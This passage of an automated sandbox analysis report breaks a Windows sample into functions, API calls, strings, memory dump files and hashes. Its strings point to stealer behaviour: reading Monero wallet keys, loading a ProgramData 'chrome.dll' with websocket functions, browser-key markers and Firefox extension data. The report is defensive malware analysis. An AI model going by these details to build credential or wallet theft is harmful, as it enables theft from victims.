                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: a006dd08f1cdb64f299d729772a86a22f3c5b6596bea84a87573896b346a6263
                                      • Instruction ID: 697cc5b8d7cdd7cc56889b6cea29849496478af442c77922bd11126b2b9f9ae3
                                      • Opcode Fuzzy Hash: a006dd08f1cdb64f299d729772a86a22f3c5b6596bea84a87573896b346a6263
                                      • Instruction Fuzzy Hash: DD312AB1901228ABDB15EB90ED92FDEB77CAF68300F804189F20576191DF706B58CF69
                                      Function 00128950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00130E10,00000000,?), ref: 001289BF
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001289C6
                                      • wsprintfA.USER32 ref: 001289E0
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: 73828a05f65f246205d55ac878d0ca24d8fd8002903b15eb4a1d6c94710fc502
                                      • Instruction ID: 173d48467841460e866e6ce3d8dbfa8a68942d0fc53823664b2594fcc7478e8c
                                      • Opcode Fuzzy Hash: 73828a05f65f246205d55ac878d0ca24d8fd8002903b15eb4a1d6c94710fc502
                                      • Instruction Fuzzy Hash: 85213DB1A44248EFDB14DF94DD85FAEBBB8FB48711F104619FA15AB2C0C775A9008BA0
                                      Function 0011A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0011A098
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                      • API String ID: 1029625771-1545816527
                                      • Opcode ID: 1a29378c0d021ac9b3a6566097e759cccf022a79b53db1b73d08c741b5eaa30a
                                      • Instruction ID: de6bd488b7503e6afacb9acf7bb24893457d889e64f18fac2aeef4cbef38d2e0
                                      • Opcode Fuzzy Hash: 1a29378c0d021ac9b3a6566097e759cccf022a79b53db1b73d08c741b5eaa30a
                                      • Instruction Fuzzy Hash: A6F0307068D280BFD727EB61ED88B9636ADE705714F500625F5159B1D0C3795CC8CB52
                                      Function 00128EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001296AE,00000000), ref: 00128EEB
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00128EF2
                                      • wsprintfW.USER32 ref: 00128F08
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 769748085-2783943728
                                      • Opcode ID: 6493fed43e136d2919b97430259eda7eb5732b43f13a01f26eaa51e684f3aea9
                                      • Instruction ID: 37809b23c3c0f0cabd65e2237f7ac680e1070937dd27ae685bc8b70fff7233fb
                                      • Opcode Fuzzy Hash: 6493fed43e136d2919b97430259eda7eb5732b43f13a01f26eaa51e684f3aea9
                                      • Instruction Fuzzy Hash: 18E0EC75A48349FBDB21DBD4DD4AE6D77BCEB09702F000694FE099B380DA719E109B91
                                      Function 0011A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 00128CF0: GetSystemTime.KERNEL32(00130E1B,00E3E7B8,001305B6,?,?,001113F9,?,0000001A,00130E1B,00000000,?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 00128D16
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0011AA11
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 0011AB2F
                                      • lstrlen.KERNEL32(00000000), ref: 0011ADEC
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 0011AE73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: ea2f08be3164042fab3b70eec9839dbda2ef7c4b9dc4333b88de321d523df65d
                                      • Instruction ID: 558e8e452c54a89390e7ff62fd7d0644e1dcdd49cd74f52d0fbaaa80cc722705
                                      • Opcode Fuzzy Hash: ea2f08be3164042fab3b70eec9839dbda2ef7c4b9dc4333b88de321d523df65d
                                      • Instruction Fuzzy Hash: 0EE1B3729101289BCB15FBA4EDA2EEE733DBF64300F908559F51676091EF306A5CCB62
                                      Function 0011D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 00128CF0: GetSystemTime.KERNEL32(00130E1B,00E3E7B8,001305B6,?,?,001113F9,?,0000001A,00130E1B,00000000,?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 00128D16
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0011D581
                                      • lstrlen.KERNEL32(00000000), ref: 0011D798
                                      • lstrlen.KERNEL32(00000000), ref: 0011D7AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 0011D82B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: ad5eaef72ff7d876e87389524a9f058978b9b4a7fcd746796e74b11df9f09681
                                      • Instruction ID: 559157c5f2705f5b4400de266ded813071235de5d7f2589ee82ef2ef31e41abb
                                      • Opcode Fuzzy Hash: ad5eaef72ff7d876e87389524a9f058978b9b4a7fcd746796e74b11df9f09681
                                      • Instruction Fuzzy Hash: C591F7729101189BCB15FBA4EDA2EEE733DAF74300F904569F51676091EF307A68CB62
                                      Function 0018FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction ID: 919f20f67f15952651ed1a6e48c69024132702b8f95262400e37bf8d60c7aa70
                                      • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction Fuzzy Hash: 4351B172600206AFEF2AEF54D881BBA77A4FF55710F28412DFA0586591E731EE41DF90
                                      Function 0011A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 0011A664
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocLocallstrcpy
                                      • String ID: @$v10$v20
                                      • API String ID: 2746078483-278772428
                                      • Opcode ID: 31797696746350179fda68a4e7f89c73c06382dbb740f260dbc6abf0e9c16b30
                                      • Instruction ID: 1457015b051c8c4d96d188ba14c756f838dc6f0009404c1e1552239f088b7dbe
                                      • Opcode Fuzzy Hash: 31797696746350179fda68a4e7f89c73c06382dbb740f260dbc6abf0e9c16b30
                                      • Instruction Fuzzy Hash: B6516F70A1020CEFDB18DFA4DD96FED77B6AF54300F808428F90A6B291EB706A45CB51
                                      Function 0011F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 0011A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0011A13C
                                        • Part of subcall function 0011A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0011A161
                                        • Part of subcall function 0011A110: LocalAlloc.KERNEL32(00000040,?), ref: 0011A181
                                        • Part of subcall function 0011A110: ReadFile.KERNEL32(000000FF,?,00000000,0011148F,00000000), ref: 0011A1AA
                                        • Part of subcall function 0011A110: LocalFree.KERNEL32(0011148F), ref: 0011A1E0
                                        • Part of subcall function 0011A110: CloseHandle.KERNEL32(000000FF), ref: 0011A1EA
                                        • Part of subcall function 00128FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00128FE2
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00131678,00130D93), ref: 0011F64C
                                      • lstrlen.KERNEL32(00000000), ref: 0011F66B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: b6ce01dbc421c82c60dcbdc276740582bbb9ae9f028bc1a18e2f41b4359930de
                                      • Instruction ID: 8f7af6901672152dffbcb68674b6410a30ace59333773a6f2bf9e0bc6b537701
                                      • Opcode Fuzzy Hash: b6ce01dbc421c82c60dcbdc276740582bbb9ae9f028bc1a18e2f41b4359930de
                                      • Instruction Fuzzy Hash: 8751F371D101189BCB04FBF4EDA6DED7379AF64300F808968F91667191EF346A18CB62
                                      Function 001237B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
